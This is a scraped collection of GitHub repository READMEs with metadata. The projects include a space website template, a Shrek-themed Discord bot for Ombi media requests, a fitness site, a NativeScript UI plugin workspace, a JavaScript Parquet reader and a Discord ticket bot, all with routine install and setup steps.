# space-web-template Space exploration website template WEBSITE IMAGES ![Screenshot (211)](https://github.com/TheCodeDaniel/space-web-template/assets/130862856/05873f76-64d6-4e7e-8c3c-d61163082fa5) ![Screenshot (215)](https://github.com/TheCodeDaniel/space-web-template/assets/130862856/0cc6ebea-3af6-48f0-b176-ef544ad84a0f) ![Screenshot (216)](https://github.com/TheCodeDaniel/space-web-template/assets/130862856/6e239b44-fd8d-43c4-8b3f-8f2d1b3624c8) ![Screenshot (218)](https://github.com/TheCodeDaniel/space-web-template/assets/130862856/6ea8b4d1-a26b-4236-8f7d-0f1447e58db6) ![Screenshot (219)](https://github.com/TheCodeDaniel/space-web-template/assets/130862856/c98e4b0e-3100-41b6-8ed3-dd4468560b1f) ![Screenshot (220)](https://github.com/TheCodeDaniel/space-web-template/assets/130862856/51010ba3-efec-48da-9ef0-0a700d5fe211) ![Screenshot (221)](https://github.com/TheCodeDaniel/space-web-template/assets/130862856/da82fb38-307f-460c-80a2-0f7650cc5aa6) ![Screenshot (222)](https://github.com/TheCodeDaniel/space-web-template/assets/130862856/a1a39819-f29d-4bf2-b2c6-29c051ff110d) ![Screenshot (223)](https://github.com/TheCodeDaniel/space-web-template/assets/130862856/bded6094-4f28-4280-8d6d-fed27ecf4129) ![Screenshot (225)](https://github.com/TheCodeDaniel/space-web-template/assets/130862856/8c0e194a-3add-4e76-af45-4c4b96ac6bec) ![Screenshot (226)](https://github.com/TheCodeDaniel/space-web-template/assets/130862856/7de06efe-8dd5-4f4e-acc5-204b8891f306) ![Screenshot (227)](https://github.com/TheCodeDaniel/space-web-template/assets/130862856/9beb14b6-567e-4b55-be6b-75b989370aef) ![Screenshot (228)](https://github.com/TheCodeDaniel/space-web-template/assets/130862856/12ba7cc4-dc62-4609-b69b-31a5f87a7d57) ![Screenshot (229)](https://github.com/TheCodeDaniel/space-web-template/assets/130862856/afaeb179-92e8-4874-93a2-faf26c1407de) ![Screenshot (231)](https://github.com/TheCodeDaniel/space-web-template/assets/130862856/93734ead-b048-421f-b3c6-e5b7c6c81733)
Space exploration website template
angularjs,bootstrap4,html5,javascript,json,local-api,svg-icons
2023-05-15T23:48:47Z
2023-05-16T00:00:41Z
2023-05-16T00:00:41Z
1
0
2
0
0
6
null
null
HTML
DonairSauce/shrekbot
master
# Shrekbot ![Shrekbot Logo](https://upload.wikimedia.org/wikipedia/en/4/4d/Shrek_%28character%29.png) ## Description Shrekbot is a Discord bot inspired by the lovable ogre himself, Shrek. It allows users to request movies or TV shows to be added to Ombi, a media request platform, using API calls. With Shrekbot, requests can be made directly within the Discord client, making it convenient and fun for users to discover and request their favorite content. Additionally, Shrekbot can notify users when the requested content becomes available to watch, ensuring they never miss out on their favorite shows and movies. ## Features - **Seamless Requesting**: Users can easily request movies or TV shows to be added to Ombi with simple commands right in the Discord client. - **Ombi Integration**: Shrekbot uses API calls to communicate with Ombi, ensuring accurate and efficient processing of requests. - **Notifications**: Shrekbot can notify users when the content they requested becomes available, keeping them updated and ready to watch. - **Shrek-themed Interface**: Embrace the charm of Shrek with a bot that reflects the spirit of the beloved ogre. ### Configuration Before running Shrekbot, you need to set the following environment variables: - `ombitoken`: Secret token of the Ombi server. - `ombiip`: IP address of the Ombi server. - `ombiport`: Port number of the Ombi server. - `clientid`: Discord bot ID. - `guildid`: Discord server ID. - `token`: Bot token found on the [Discord Developer Portal](https://discord.com/developers/). - `channelfeed`: Channel ID used to notify users when content is available. - `timerexp`: Time (in milliseconds) before a search expires if the user doesn't respond. You can set these environment variables in your Docker environment or in a `.env` file. ### Running Shrekbot Once you have set the environment variables, you can run Shrekbot using Docker: Pull the Docker image from the package repository: `docker run -d \ --name shrekbot \ --env-file .env \ ghcr.io/donairsauce/shrekbot:master` Make sure to replace .env with the path to your environment variable file. ## Running Shrekbot without Docker Please note that these instructions assume you have Node.js and npm installed on your machine. If not, make sure to install them before proceeding. To run Shrekbot without Docker, you can follow these steps: 1. Clone the repository: ```bash git clone https://github.com/donairsauce/Shrekbot.git 2. Install the required dependencies. Navigate to the cloned repository's directory: `cd Shrekbot` Then, install the dependencies using a package manager such as npm: `npm install` 3. Set the environment variables: Before running Shrekbot, make sure to set the required environment variables. You can do this by creating a .env file in the root directory of the project and specifying the following variables: ```ombitoken=<Ombi server token> ombiip=<Ombi server IP> ombiport=<Ombi server port> clientid=<Discord bot ID> guildid=<Discord server ID> token=<Bot token from Discord Developer Portal> channelfeed=<Channel ID for notifications> timerexp=<Time in milliseconds for search expiration> ``` 4. Start Shrekbot: `npm start` ## Usage To interact with Shrekbot, join a Discord server where the bot is present. Use the following command to initiate a search and request content: - `/request [query]`: Initiates a search and returns the top ten results in a drop-down list. Once you enter the `/request` command followed by your query, Shrekbot will perform the search and present the results in a drop-down list. The first result will be automatically selected, and its details, including title, description, release date, and poster, will be displayed. You can change the selection as many times as you want by using the drop-down list to navigate through the list. When you find the desired content, simply click the "Request" button to submit your request. Shrekbot will process the request and communicate with Ombi to add the selected content to the media library. You will receive a notification when the requested content becomes available. ### Examples: - `/request Shrek`: Initiates a search for the movie "Shrek" and presents the results. - `/request Game of Thrones`: Initiates a search for the TV show "Game of Thrones" and presents the results. Feel free to explore and request your favorite movies and TV shows with Shrekbot! ![Request Example](https://i.imgur.com/mfHzkCh.png) ## Enabling Notifications in Ombi To enable notifications for content availability, follow these steps in Ombi: 1. Go to Ombi settings. 2. Select the "Notifications" tab. 3. Under the "Webhook" section, check the "Enabled" checkbox. 4. In the "Base Url" field, enter the location where the bot is hosted, followed by `:8154/webhook`. For example, if the bot is hosted at `http://192.168.1.1`, enter `http://192.168.1.1:8154/webhook`. 5. Save the settings. By enabling notifications in Ombi and providing the correct base URL, Shrekbot will be able to send notifications to the specified channel when the requested content becomes available to watch. ![Notification Example](https://i.imgur.com/BtTm5Ze.png) ## Support and Feedback If you have any questions, need support, or want to provide feedback, you can join our Discord server: [Join Shrekbot Discord Server](https://discord.gg/Jhr9e9RHwE) ## Contributing Contributions to Shrekbot are welcome! If you want to contribute to the project, please follow these guidelines: 1. Fork the repository. 2. Create a new branch: `git checkout -b feature/your-feature`. 3. Make your changes and commit them: `git commit -am 'Add your feature'`. 4. Push to the branch: `git push origin feature/your-feature`. 5. Submit a pull request. ## License This project is licensed by Lord Farquaad. --- Developed with 💚 for Shrek.
Request for Movies & TV Shows in Ombi
api,bot,discord,discord-bot,discord-js,javascript,nodejs,ombi,radarr,sonarr
2023-05-04T01:55:49Z
2024-05-09T15:40:05Z
2024-05-01T18:30:29Z
4
28
133
3
0
6
null
null
JavaScript
Shubhangisaini205/WellFit--A-Fitness-website
main
# WellFit In this project we have tried to build Fitness website where user can get pre-defined workout plans, curated workout videos based on users options. User can also get basic nutrients values of whatever food user want. ### Deployed Link:- https://frontend-tau-jade.vercel.app/ ## Features - Signup/Signin functionality - User can get nutrients values (calories,carbs,fats,fibre and sugar) per 100gm of any food item - Pre-defined workout plan for Beginners with steps - User can also get custom workouts based on their prefernces of target muscle, level of difficulty and category like bodyweight workouts, dumbell workouts etc. - Custom workouts are different for every user. - AI chatbot for 24/7 assistance regarding health and fitness. - User can also track goals of different exercises like running, cycling, swimming etc ## Screenshots ### Landing Page ![Landing Page](https://github.com/Shubhangisaini205/WellFit-Collective/assets/115460351/a0dd9eda-dd5e-4958-abbe-75b51479f003) ### Search Results of Food Item ![Nutrients](https://github.com/Shubhangisaini205/WellFit-Collective/assets/115460351/0a2ff754-8a05-4e3c-a6d1-0805f133f2df) ### Pre-defined Plans Page ![Plans Page](https://github.com/Shubhangisaini205/WellFit-Collective/assets/115460351/4b9ac4b4-4c55-4271-a1c3-78302259cadf) ### Custom workout preference form ![Custom Form](https://github.com/Shubhangisaini205/WellFit-Collective/assets/115460351/b3818dbc-ec37-4705-bd63-89debfe24471) ### Custom Workout Page ![Custom Workout Page](https://github.com/Shubhangisaini205/WellFit-Collective/assets/115460351/acdc019a-19cb-4c09-991a-a2e881a21c70) ### AI Chatbot ![Chatbot](https://github.com/Shubhangisaini205/WellFit-Collective/assets/115460351/a0457886-a7a8-424a-a755-89e11c5803c2) ### Goal Tracking Page ![Goal Tracking](https://github.com/Shubhangisaini205/WellFit-Collective/assets/115460351/55f8370d-9b4d-4b54-8680-1fc342edc4e2) ### Graph showing users progress ![Grap](https://github.com/Shubhangisaini205/WellFit-Collective/assets/115460351/b1a0aa9d-d932-457c-91dd-88d7c3206f43) ## Authors - [@Shubhangisaini205](https://github.com/Shubhangisaini205) - [@RutuvikP](https://github.com/RutuvikP) - [@animesh](https://github.com/animesh-0041) - [@Pankaj](https://github.com/Pankaj-bit361)
In this project we have tried to build Fitness website where user can get pre-defined workout plans, curated workout videos based on users options. User can also get basic nutrients values of whatever food user want.
expressjs,javascript,mongodb,mongoose,nodejs,reactjs,tailwindcss,typescript
2023-05-11T13:03:01Z
2023-05-15T09:52:18Z
null
4
13
45
0
3
6
null
null
TypeScript
Kavin1421/Django-Ecommerce
main
# Django-Ecommerce Creating an E-Commerce with the tools of Python and Django with My-sql ## Run these Commads ### Step 1 pip install -r requirements.txt ### Step 2 python manage.py migrate ### Step 4 python manage.py createsuperuser ### Step 3 python manage.py runserver
Creating an E-Commerce with the tools of Python and Django with My-sql
django,python,javascript,mysql
2023-04-23T03:55:29Z
2023-06-11T14:50:53Z
null
1
0
19
0
0
6
null
null
JavaScript
GonzaloVolonterio/react-native-onlyfans-clone-app
main
# OnlyFans clone Full Stack App ### OnlyFans clone app is a full stack app, front end and back end for mobile,replicates the features and functionality to the same. ### Built With ``` Expo React-Native AWS ``` ### Clone repo 🔧 ``` https://github.com/GonzaloVolonterio/react-native-onlyfans-clone-app ``` ### Install🔧 ``` npm install npx expo start or npm start ``` Or you can Scan QR ,for this you need have the Expo Go app installed. ![qr-onlyfans](https://user-images.githubusercontent.com/64506662/234362778-e328a959-beb7-4d11-9094-9877843d4b64.jpg) Examples App ### You need create a free account to use the app ![Screenshot_20230424-200925](https://user-images.githubusercontent.com/64506662/234364566-863bc1e1-e289-4b9b-9658-a11e737bebd8.png) ![Screenshot_20230424-200957](https://user-images.githubusercontent.com/64506662/234364579-8e32708f-cb69-4c1c-82e3-eefd7cb5f161.png) ![Screenshot_20230424-201003](https://user-images.githubusercontent.com/64506662/234364622-e9cc5d14-77f2-415f-9027-1d3ffe3e7c17.png) ![Screenshot_20230424-201006](https://user-images.githubusercontent.com/64506662/234364653-73de6b92-b7a6-4ef7-a3a6-c26411bfd46a.png) ![Screenshot_20230424-201031](https://user-images.githubusercontent.com/64506662/234364754-f5ce7da1-1ad1-4e90-bf85-40add436ad23.png)
OnlyFans clone app is a full stack app, front end and back end for mobile,replicates the features and functionality to the same.
aws,backend,expo,front-end,full-stack,javascript,react-native
2023-04-25T17:22:02Z
2023-04-25T18:14:57Z
null
1
0
16
0
6
6
null
null
JavaScript
NativeScript/ui-kit
main
- [@nativescript/flutter](packages/flutter/README.md) - [@nativescript/ionic-portals](packages/ionic-portals/README.md) - [@nativescript/jetpack-compose](packages/jetpack-compose/README.md) - [@nativescript/rive](packages/rive/README.md) - [@nativescript/swift-ui](packages/swift-ui/README.md) - [@nativescript/ui-charts](packages/ui-charts/README.md) # How to use? This workspace manages the suite of plugins listed above. In general, when in doubt with what to do, just `npm start`. ## Testing Flutter You will need [Flutter installed](https://docs.flutter.dev/get-started/install). 1. Uncomment sections in: - `tools/assets/App_Resources/iOS/Podfile` - `tools/assets/App_Resources/Android/settings.gradle` 2. To run on Android, build the flutter module first ``` cd apps/demo/flutter_views/.android ./gradlew Flutter:assemble ``` ### Note about "focus modes" `npm start` > `focus.{any-plugin}` ENTER will focus the workspace to a single plugin for working on it in isolation. The swift-ui plugin is currently managed here and we have testing code for it here: https://github.com/NativeScript/ui-kit/blob/main/tools/assets/App_Resources/iOS/src/BasicViewProvider.swift ... however when focusing on any other plugins, you would need to rename those .swift > .off so they aren't included in the demo to work with other plugins. Since the supporting .swift files include SwiftUIProvider which comes from only the swift-ui plugin. ## How to add a new package to workspace? ``` npm run add ``` At the prompt, enter the name of the new package. - This adds a plugin harness in `packages` with the necessary boilerplate to just start developing - Updates all demo app flavors to support demoing the new package - Adds shared code in `tools/demo` where you can write demo code **once** and share across all demo flavors - Updates build tooling to support the new package - Updates the `npm start` interactive display - Updates the README here to list the new package ## How to add Angular compatibility to a package ``` npm run add-angular ``` At the prompt, enter the name of the package to add an `angular` folder to it with the necessary boilerplate to provide Angular support to the package. ## How to focus on just 1 package to develop in isolation ``` npm start ``` - Choose the focus commands for the package you wish to focus on and hit enter. - All the demo app's will be updated to isolate that 1 package and for supported IDE's (currently VS Code), the source code will also become isolated in the workspace. Note: *good to always clean the demo you plan to run after focusing. (You can clean any demo from `npm start` as well)* ## How to publish packages? ``` npm run publish-packages ``` - You will be prompted for the package names to publish. Leaving blank and hitting enter will publish them all. - You will then be prompted for the version to use. Leaving blank will auto bump the patch version (it also handles prerelease types like alpha, beta, rc, etc. - It even auto tags the corresponding prelease type on npm). - You will then be given a brief sanity check 🧠😊 <h3 align="center">Made with ❤️</h3>
Various UI plugins including SwiftUI, Jetpack Compose, Flutter, Ionic Portals, HighCharts and more.
dart,flutter,highcharts,javascript,nativescript,typescript,capacitor,ionic,jetpack-compose,kotlin
2023-05-03T03:56:51Z
2024-05-13T23:50:16Z
null
4
6
25
3
1
6
null
Apache-2.0
JavaScript
ChristapherAntony/Clean-Architecture
master
## eCommerce Project Welcome to the ongoing eCommerce project built with Node.js, MongoDB, and Express using clean architecture. This project is designed to help developers learn about the structure and implementation of clean architecture in a real-world eCommerce application. ### Introduction The goal of this project is to build a scalable and maintainable ecommerce platform using Node.js, MongoDB and Express with Clean Architecture. The project is divided into different modules such as Category, Product, User and Order. Each module has its own use cases, entities, repositories and controllers. ### Architecture Clean Architecture is used for this project. Clean Architecture is a software design pattern that emphasizes the separation of concerns and the use of layers to ensure that the code is maintainable, testable and scalable. Clean Architecture consists of four layers: - Entities: These are the domain models or business objects that encapsulate the business rules and logic. - Use Cases: These are the application-specific business rules that define the use cases of the application. - Repository: These are the gateways or interfaces that define the methods to interact with the data sources. - Controllers: These are the interfaces that handle the HTTP requests and responses. ## Features added ### Categories - Create a new category - Update an existing category - Delete a category - List all categories ### Products - Create a new product - Update an existing product - Delete a product ## Getting Started To get started with this project, follow these steps: - Clone the repository to your local machine. - Install the required dependencies by running npm install. - Create a .env file in the root directory and add the necessary environment variables. - Start the server by running npm start. ###Environment Variables The following environment variables are required to run this project: PORT: The port number on which the server will run. MONGODB_URI: The URI for the MongoDB database. ## Features ### Categories - Create a new category - Update an existing category - Delete a category - List all categories ### Products - Create a new product - Update an existing product - Delete a product ## Contributing If you would like to contribute to this project, please follow these steps: - Fork the repository. - Create a new branch for your feature or bug fix. - Make your changes and commit them with descriptive commit messages. - Push your changes to your fork. - Submit a pull request to the main repository.
It's an ecommerce backend made with clean architecture
clean-architecture,exppress-js,javascript,mogodb,node-js
2023-05-07T09:28:02Z
2023-05-14T11:05:14Z
null
1
4
16
0
2
6
null
null
JavaScript
AK016/Travelo
main
# Travelo - Your Ultimate Travel Planner Welcome to Travelo, the perfect companion for your travel adventures! Plan, discover, and book your dream vacations with ease. ## Homepage ![Homepage](https://github.com/AK016/Travelo/assets/123861375/a4069647-1132-4ccd-9734-8b377acb2683) Our homepage is designed to inspire and guide you through the fantastic world of travel. Discover featured destinations, latest travel trends, and exclusive offers that will make your next journey unforgettable. ## Destinations ![Destinations](https://github.com/AK016/Travelo/assets/123861375/f6a652cb-2474-41c5-b3f8-b3a4f3e337d4) Explore our diverse range of travel packages and destinations on the Destinations page. From exotic beaches to cultural landmarks, Travelo offers a variety of options to suit every traveler's taste. Each destination comes with detailed information, photos, and pricing to help you make an informed decision. ## Features ### User Sign In/Sign Up Create a personalized Travelo account to unlock exclusive features. Sign in to access your saved itineraries, preferences, and more. If you're new to Travelo, our simple sign-up process ensures you get started on your travel journey effortlessly. ### Cart Easily manage your selected travel packages with our user-friendly cart feature. Add, remove, or modify your choices before finalizing your dream itinerary. ### Payment Experience a secure and seamless payment process when you're ready to book your adventure. Travelo supports various payment methods, providing you with flexibility and peace of mind. ### Admin Options For administrators, Travelo offers CRUD (Create, Read, Update, Delete) operations on the API. Manage travel packages, update information, and ensure that the content stays fresh and relevant. ## Access Travelo Live Visit [Travelo Live](https://travelowithus.netlify.app/index.html) to start your travel journey now! ## API Explore our API [here](https://644fd9a0ba9f39c6ab6e09a7.mockapi.io/travelplan) for a deeper integration with Travelo. Developers can leverage the API to enhance the website's functionality and provide an even more personalized experience for users. ## Feedback We value your feedback! If you have any suggestions, questions, or encounter any issues, please reach out to us through our [contact page](mailto:akshaykadam9010@gmail.com). Happy Travels with Travelo! 🌍✈️
Travelo is Travel Planner Website mainly created with an objective to provide travel plans to all its customer
api,css,html,javascript
2023-05-02T18:46:33Z
2023-12-15T16:18:29Z
null
3
13
55
0
1
6
null
null
CSS
proxygo/O-fantasma-Detetive
main
# O-fantasma-Detetive Jogo O fantasma Detetive Jogo de aventura e investigação. Ajude o fantasminha a percorrer pela biblioteca, encontrar as pistas e desvendar o misterio.
Jogo O fantasma Detetive
canvas,css,game,game-development,html,javascript,unicorn,hacktoberfest,hacktoberfest2023
2023-05-02T03:43:11Z
2023-10-12T16:32:38Z
null
2
2
11
1
2
6
null
null
JavaScript
CodeSystem2022/Grupo-OMEGA-TercerSemestre
main
Grupo OMEGA! [![photo-4933835443988966061-x.jpg](https://i.postimg.cc/wTwxB4W8/photo-4933835443988966061-x.jpg)](https://postimg.cc/HV71ZzDB) [![binary-2904980-1280.jpg](https://i.postimg.cc/yxqkQCXM/binary-2904980-1280.jpg)](https://postimg.cc/ZBcbngQH) ¡¡LENGUAJES!! [![descarga.jpg](https://i.postimg.cc/dVfRPBrw/descarga.jpg)](https://postimg.cc/v4Wx550N) [![python.webp](https://i.postimg.cc/y6r8TbH1/python.webp)](https://postimg.cc/ThgxdQ1F) [![images.jpg](https://i.postimg.cc/K8hFqXs2/images.jpg)](https://postimg.cc/XpLTqPbH) "INTEGRANTES" -Gaston Riveros -Belen Rabel -Nicolas Abete -Leonel Real -Gustavo D'ellac -Dario Tamini -Julieta Gutierrez (www.linkedin.com/in/mjulietagutierrez) # "MARCO SCRUM" ### Scrum es un marco de trabajo ágil centrado en la entrega interactiva e incremental ### de productos de alta calidad a travéz de la colaboracion, la comunicacion y la retroalimentacion ### continua entre los miembros del equipo,con roles y responsabilidades claras y un enfoque en la ### mejora continua del proceso ## "ORGANIZACION SEMANAL" │ WEEK │ Scrum Master │ │------------- │----------------│ │:PENCIL: WEEK 1 │ Julieta Gutierrez │ │:PENCIL: WEEK 2 │ Dario Tamini │ │:PENCIL: WEEK 3 │ Leonel Real │ │:PENCIL: WEEK 4 │ Belen Rabel │ │:PENCIL:WEEK 5 │ Nicolas Abete │ │:PENCIL:WEEK 6 │ Gaston Riveros │ │:PENCIL:WEEK 7 │ Gustavo De Llac │ |:PENCIL:WEEK 8 | Julieta Gutierrez | |:PENCIL:WEEK 9 | Dario Tamini | |:PENCIL:WEEK 10 | Leonel Real | |:PENCIL:WEEK 11 | Belen Rabel | |:PENCIL:WEEK 12 | Nicolas Abete |
Repositorio en el que subiremos ejercicios vistos en clase de java, python y javascript
java,javascript,python
2023-04-27T12:54:31Z
2023-07-04T01:35:01Z
2023-07-03T10:42:48Z
11
0
193
60
0
6
null
null
Java
samthor/parq
main
parq is a Parquet reader in JavaScript. [Install from NPM via "parq"](https://www.npmjs.com/package/parq). [Demo here](https://samthor.github.io/parq/). ## Usage You can build a reader and then iterate over its contents, yielding a `Uint8Array` for each value: ```js import { buildReader, flatIterate } from 'parq'; const bytes = /* Uint8Array from somewhere */; const pr = await buildReader(bytes); // iterate over the data in rows 100-200 of column zero const it = flatIterate(pr, 0, 100, 200); let i = 100; for await (const value of it) { console.info(`col0 row${i}=`, value); ++i; } ``` It's a bit awkward to receive a `Uint8Array` per-value (you can use `DataView` to read its contents), but it matches how Parquet works: it has a variety of primitive data types _as well as_ the `BYTE_ARRAY` type which has variable length. This type is usually used for UTF-8 encoded strings. To find out what type is used per-column, check `pr.info().columns` for their name, type, and so on, before indexing. ### Advanced Usage You can access the low-level methods on `ParquetReader` to read raw page data directly. These need a little bit of work to eventually render, but this means you can process the data more efficiently. You can also pass a `Reader` implementation to `buildReader` instead of raw bytes. This is a method which reads bytes in a specific range, useful if you are processing large files and don't want to read it from disk or network all at once. ## Support This is missing support for Parquet files that use: - data pages v2 - compression codecs `LZO`, `BROTLI`, `LZ4`, `LZ4_RAW` - possibly complex nested schemas. It supports compressions `SNAPPY`, `GZIP`, and `ZSTD` _via_ a dynamic import of the [zstddec](https://www.npmjs.com/package/zstddec) package. If you need `ZSTD`, install "ztsdec" and instruct your bundler to use it. (I can see adding [brotli-wasm](https://www.npmjs.com/package/brotli-wasm) for `BROTLI` if it's needed in the same way.) ## Demo There's a simple demo [on GitHub Pages](https://samthor.github.io/parq/), with the source in [demo](./demo). This uses a `Worker` to process Parquet data remotely, which means that this code can trivially handle gigabyte or more file sizes. It implements a remote `ParquetReader` that connects to the worker.
Parquet reader in JS
javascript,parquet
2023-04-28T02:43:23Z
2024-01-14T23:07:43Z
null
1
0
62
0
0
6
null
null
TypeScript
Jotaherrera/DOMMAN
main
# DOMMAN ![Image of landing page](/public/assets/github/landing.png 'Landing Image') ## Technologies The following technologies were used to develop this project: - [Node.js](https://nodejs.org/en/) - [Express.js](https://expressjs.com/) - [MongoDB Atlas](https://www.mongodb.com/cloud/atlas) - JavaScript - HTML - CSS ## Prerequisites Before using this project, make sure that you have installed Node.js on your local machine. You can download and install Node.js from the official website: <https://nodejs.org/en/download/>. To check if Node.js is installed, open a terminal or command prompt and run the following command: `$ node -v` If Node.js is installed, you will see the version number printed in the terminal. If it is not installed, please download and install it before proceeding with this project. ## Installation 1. Clone the repository to your local machine: `$ git clone https://github.com/Jotaherrera/DOMMAN.git` 2. Navigate to the project directory: `$ cd DOMMAN` 3. Install the required npm packages: `$ npm install` This will install all the necessary packages and dependencies required to run the project. 4. Start the project: `$ npm run start` This will start the project on your local machine. You can now view it in your browser at <http://localhost:3000>. ## Operation The program has three controls that affect the way the words are displayed: 1. **Slider bar:** This control adjusts the speed of the word display. Moving the slider to the right increases the speed, while moving it to the left decreases the speed. The words will always appear in the center of the screen. 2. **Play/Pause button:** This control toggles the display on and off. Pressing the button will pause the display, and pressing it again will resume the display. 3. **Stop button:** This control resets the display to the first word in the list. Additionally, if you add `/words` to the URL (<http://localhost:3000/words>), you will be able to view a portion of the data extracted from the MongoDB Atlas database. Please note that this API functionality currently does not provide the entire database data and field. In the future, it will be able to show all the content of the database. When the API is complete, it will be separated from the project to live independently and provide direct access to the data extracted from the database.
A minimalist app that displays big, contrasting words to help you focus your attention and improve your reading speed 📖
css,expressjs,javascript,nodejs,reading,speedcontrol,words,html,domman
2023-04-27T18:24:56Z
2023-05-13T18:00:11Z
null
1
0
43
0
0
6
null
MIT
JavaScript
dhanushtheijas08/connect-request-ai
master
# LinkBuddy LinkBuddy is a Chrome extension that generates connect request notes for LinkedIn profiles using OpenAI's GPT-3. ## Installation To install the extension, follow these steps: 1. Go to the extension's GitHub repository: https://github.com/dhanushtheijas08/connect-request-ai 2. Click on the green "Code" button and select "Download ZIP". This will download the extension's source code to your computer. 3. Extract the downloaded ZIP file to a folder of your choice. 4. Open Google Chrome and navigate to chrome://extensions/ in the address bar. 5. Turn on the "Developer mode" toggle in the top right corner of the page. 6. Click on the "Load unpacked" button in the top left corner of the page. 7. Select the folder where you extracted the extension's source code in step 3. 8. The extension should now be installed and ready to use. ## Usage Once the extension is installed, navigate to a LinkedIn profile page and click on the LinkBuddy icon in the browser toolbar. This will open a popup where you can enter some information about the connection request and generate a custom note using GPT-3. ## Contributing If you would like to contribute to this project, feel free to open a pull request or submit an issue on the GitHub repository.
LinkBuddy is a Chrome extension that uses OpenAI's GPT-3 to generate connect request notes for LinkedIn profiles. This extension is designed to save time for users who frequently send out connection requests on LinkedIn. The extension is free and open-source.
chrome-extension,javascript,linkedin,openai-api
2023-05-05T13:45:24Z
2023-05-18T16:04:00Z
null
1
0
23
0
1
6
null
null
JavaScript
Choaib-ELMADI/portfolio-design-2
main
<h1><a href='https://elmadi-p-2.netlify.app' target='_blank'>VIEW LIVE</a></h1> <h1>Large Devices :</h1> <img src="demos/desktop__1.png" width="500" /> <img src="demos/desktop__2.png" width="500" /> <img src="demos/desktop__3.png" width="500" /> <img src="demos/desktop__4.png" width="500" /> <img src="demos/desktop__5.png" width="500" /> <img src="demos/desktop__6.png" width="500" /> <img src="demos/desktop__7.png" width="500" /> <img src="demos/desktop__8.png" width="500" /> <img src="demos/desktop__9.png" width="500" /> <h1>Small Devices :</h1> <img src="demos/small__1.jpg" width="200" height="420" /> <img src="demos/small__2.jpg" width="200" height="420" /> <img src="demos/small__3.jpg" width="200" height="420" /> <img src="demos/small__4.jpg" width="200" height="420" /> <img src="demos/small__5.jpg" width="200" height="420" /> <img src="demos/small__6.jpg" width="200" height="420" /> <img src="demos/small__7.jpg" width="200" height="420" /> <img src="demos/small__8.jpg" width="200" height="420" /> <img src="demos/small__9.jpg" width="200" height="420" />
A 3d portfolio with some awesome animations implemented using vite with react.js and gsap platform.
css,gsap,javascript,react
2023-04-23T09:46:23Z
2023-04-23T18:01:08Z
null
1
0
54
0
0
6
null
null
CSS
Cunga0X/Ticket-Bot
main
<!-- Improved compatibility of back to top link: See: https://github.com/Cunga0X/Ticket-Bot/pull/73 --> <a name="readme-top"></a> <!-- *** Thanks for checking out the Best-README-Template. If you have a suggestion *** that would make this better, please fork the repo and create a pull request *** or simply open an issue with the tag "enhancement". *** Don't forget to give the project a star! *** Thanks again! Now go create something AMAZING! :D --> <!-- PROJECT SHIELDS --> <!-- *** I'm using markdown "reference style" links for readability. *** Reference links are enclosed in brackets [ ] instead of parentheses ( ). *** See the bottom of this document for the declaration of the reference variables *** for contributors-url, forks-url, etc. This is an optional, concise syntax you may use. *** https://www.markdownguide.org/basic-syntax/#reference-style-links --> [![Contributors][contributors-shield]][contributors-url] [![Forks][forks-shield]][forks-url] [![Stargazers][stars-shield]][stars-url] [![Issues][issues-shield]][issues-url] [![MIT License][license-shield]][license-url] <!-- PROJECT LOGO --> <br /> <div align="center"> <a href="https://github.com/Cunga0X/Ticket-Bot"> <img src="https://www.slomc.si/img/logo.png" alt="Logo" width="80" height="80"> </a> <h3 align="center">Tickets</h3> <p align="center"> Advanced Discord Tickets Bot <br /> <a href="https://github.com/Cunga0X/Ticket-Bot"><strong>Explore the docs »</strong></a> <br /> <br /> <a href="https://github.com/Cunga0X/Ticket-Bot">View Demo</a> · <a href="https://github.com/Cunga0X/Ticket-Bot/issues">Report Bug</a> · <a href="https://github.com/Cunga0X/Ticket-Bot/issues">Request Feature</a> </p> </div> <!-- TABLE OF CONTENTS --> <details> <summary>Table of Contents</summary> <ol> <li> <a href="#about-the-project">About The Project</a> <ul> <li><a href="#built-with">Built With</a></li> </ul> </li> <li> <a href="#getting-started">Getting Started</a> <ul> <li><a href="#prerequisites">Prerequisites</a></li> <li><a href="#installation">Installation</a></li> </ul> </li> <li><a href="#usage">Usage</a></li> <li><a href="#roadmap">Roadmap</a></li> <li><a href="#contributing">Contributing</a></li> <li><a href="#license">License</a></li> <li><a href="#contact">Contact</a></li> <li><a href="#acknowledgments">Acknowledgments</a></li> </ol> </details> <!-- ABOUT THE PROJECT --> ## About The Project This project is a Discord Ticket Bot that provides a simple and efficient way to manage customer support on Discord servers. The bot allows users to create interactive tickets with customizable categories, questions, and responses. The bot also generates HTML transcripts of the closed tickets that can be viewed online or downloaded for future reference. The bot is easy to set up and use, and can handle multiple tickets simultaneously. The bot aims to improve the quality and speed of customer service on Discord platforms. <p align="right">(<a href="#readme-top">back to top</a>)</p> ### Built With - [![Express][Express.js]][Express-url] - [![DiscordJS][Discord.js]][Discord-url] <p align="right">(<a href="#readme-top">back to top</a>)</p> <!-- GETTING STARTED --> ## Getting Started This bot offers you two options for using it. You can either add it to your server or run it on your own machine. The first option is easier and faster, while the second option gives you more control and customization. To host the bot yourself, please follow the instructions below. ### Prerequisites 1. Clone this project to your local machine using `git clone https://github.com/Cunga0X/Ticket-Bot.git` 2. Use `npm i` to install all the required packages and dependencies ### Installation 1. Create a discord bot application at [https://discord.com/developers/applications](https://discord.com/developers/applications) and get your bot token 2. Configure the `example-config.js` file with your bot token and other settings and rename it to `config.js` ```js const { resolve } = require("path"); module.exports = { TOKEN: "your token", LOGS: "channel for error logs", MONGO_DB: "your mongodb uri", LANGUAGE: { defaultLocale: "en", // "en" = default language directory: resolve("Languages"), // <= location of language }, // Options "web" or "local" TICKETS_HISTORY: "local", //WEBSERVER CONFIG PORT: 443, FQDM: "my.domain.com", }; ``` 3. For webserver ticket history, you will need to open a port for pages to be accessible. You can use [ngrok](https://ngrok.com/) or any other service to expose your local port to the internet <p align="right">(<a href="#readme-top">back to top</a>)</p> <!-- USAGE EXAMPLES --> ## Usage Soon <p align="right">(<a href="#readme-top">back to top</a>)</p> <!-- ROADMAP --> ## Roadmap - [ ] Add Changelog - [ ] Multi-language Support - [ ] Chinese - [ ] Spanish See the [open issues](https://github.com/Cunga0X/Ticket-Bot/issues) for a full list of proposed features (and known issues). <p align="right">(<a href="#readme-top">back to top</a>)</p> <!-- CONTRIBUTING --> ## Contributing Contributions are what make the open source community such an amazing place to learn, inspire, and create. Any contributions you make are **greatly appreciated**. If you have a suggestion that would make this better, please fork the repo and create a pull request. You can also simply open an issue with the tag "enhancement". Don't forget to give the project a star! Thanks again! 1. Fork the Project 2. Create your Feature Branch (`git checkout -b feature/AmazingFeature`) 3. Commit your Changes (`git commit -m 